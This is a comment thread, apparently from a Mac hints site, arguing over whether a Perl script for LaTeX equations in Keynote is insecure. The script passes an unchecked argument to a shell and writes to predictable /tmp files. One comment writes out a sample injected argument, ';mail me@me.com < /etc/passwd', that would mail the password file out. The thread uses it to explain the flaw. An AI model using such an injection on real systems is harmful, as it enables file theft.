Submit Hint Search The Forums LinksStatsPollsHeadlinesRSS
14,000 hints and counting!


Click here to return to the 'Use LaTeX formatted equations in Keynote' hint
The following comments are owned by whoever posted them. This site is not responsible for what they say.
Use LaTeX formatted equations in Keynote
Authored by: KM on Feb 20, '03 11:11:18AM

This script has a security issue. You are blindly passing $ARGV[0] to a system command. And, you better hope that if this is run in a shared environment, no one has symlinked (or hard linked) the /tmp/eq.* files to something else.. so 2 possible security risks if this is run in a multiuser environment.



[ Reply to This | # ]
Use LaTeX formatted equations in Keynote
Authored by: EddEdmondson on Feb 20, '03 12:06:45PM

That /tmp/ stuff is a fair comment. I was aware of the ARGV thing but I wouldn't call that a security problem myself. Just did this to get stuff working and was hoping someone here would make it nicer.

Incidentally now I've changed my version to drop the $s etc., and also I just use EquationService now anyway! Far better.



[ Reply to This | # ]
Use LaTeX formatted equations in Keynote
Authored by: KM on Feb 20, '03 04:50:48PM
You don't consider something like this a security issue? This is essentially what your code does:

system("echo $ARGV[0]");

Now, if the script was named foo.pl and called like:

foo.pl ";mail me@me.com

[ Reply to This | # ]

Use LaTeX formatted equations in Keynote
Authored by: KM on Feb 20, '03 04:53:38PM
(Sorry for reposting this, the > was un-entitized when I previewed and cut off some of post.. seems like a bug) You don't consider something like this a security issue? This is essentially what your code does:

system("echo $ARGV[0]");

Now, if the script was named foo.pl and called like:

foo.pl ";mail me@me.com < /etc/passwd"

I'd get your passwd file. Or, perform whatever (multiple) shell functions I can with the permissions of the script. That's a security issue, and a basic one. I appreciate that you posted a hint, don't get me wrong... but too many times people take code from hint sites and use them, not knowing the danger that can be caused. Code with glaring security holes shouldn't be posted.. in my opinion :)

[ Reply to This | # ]

Use LaTeX formatted equations in Keynote
Authored by: EddEdmondson on Feb 20, '03 06:28:06PM

The reason I don't consider that a security issue is that if you've got access to perl and the command prompt anyway you can just get the file without faffing around with my script.

Sure it's a bad idea but it doesn't give an attacker any extra abilities they don't already have - unlike your point about tmp. Unless I'm missing something very obvious in which case I'll accept your point. I tend to just write this sort of thing for my own use, and like I said would let other people fix bugs etc. in comments.



[ Reply to This | # ]
Use LaTeX formatted equations in Keynote
Authored by: mithras on Feb 21, '03 11:53:44AM

That would be a security issue IF the script were being called from the Web or an unprivileged environment.

But your example would require the user to be able to run the command on the Mac anyway. Why call the script, if you can just run "mail me@my.com < /etc/passwd" directly?

Consider what is wrong with this statement: the 'sh' program is a HUGE security hole! It will just run willy-nilly any command you pass to it!

---
--
<a href="http://mithras.homeunix.net/downloads">my free OS X applications and scripts</a>



[ Reply to This | # ]
Use LaTeX formatted equations in Keynote
Authored by: KM on Feb 21, '03 01:54:14PM

You people are missing the point. The script is being posted on a "hints" site, and it is not secure. If it is on a multi-user environment, it can be dangerous. This isn't rocket science, it is Security 101. Posting insecure scripts on a 'hints' site is plain wrong. Period.



[ Reply to This | # ]
Use LaTeX formatted equations in Keynote
Authored by: nr on Feb 20, '03 08:15:22PM

Yes, lookout! You may allow someone to gain the privledges they already have!!



[ Reply to This | # ]
Use LaTeX formatted equations in Keynote
Authored by: KM on Feb 21, '03 01:56:46PM

No, not at all. They can gain whatever privlages the script will allow them to have. Are you people all ex-Windows users or something? You really don't understand secuirty.

Flame me all you want, but you guys need to get a clue.



[ Reply to This | # ]
Use LaTeX formatted equations in Keynote
Authored by: nr on Feb 21, '03 04:47:12PM

Well, the only way you'd get other peoples privledges is if this script was SUID. Why would it be SUID? Why would you rant so long about this, just incase someone decides to run it SUID?



[ Reply to This | # ]
Use LaTeX formatted equations in Keynote
Authored by: KM on Feb 21, '03 06:10:05PM

Because it is poor progamming! Get a clue man.



[ Reply to This | # ]
Use LaTeX formatted equations in Keynote
Authored by: nr on Feb 23, '03 02:30:44AM

*laugh*



[ Reply to This | # ]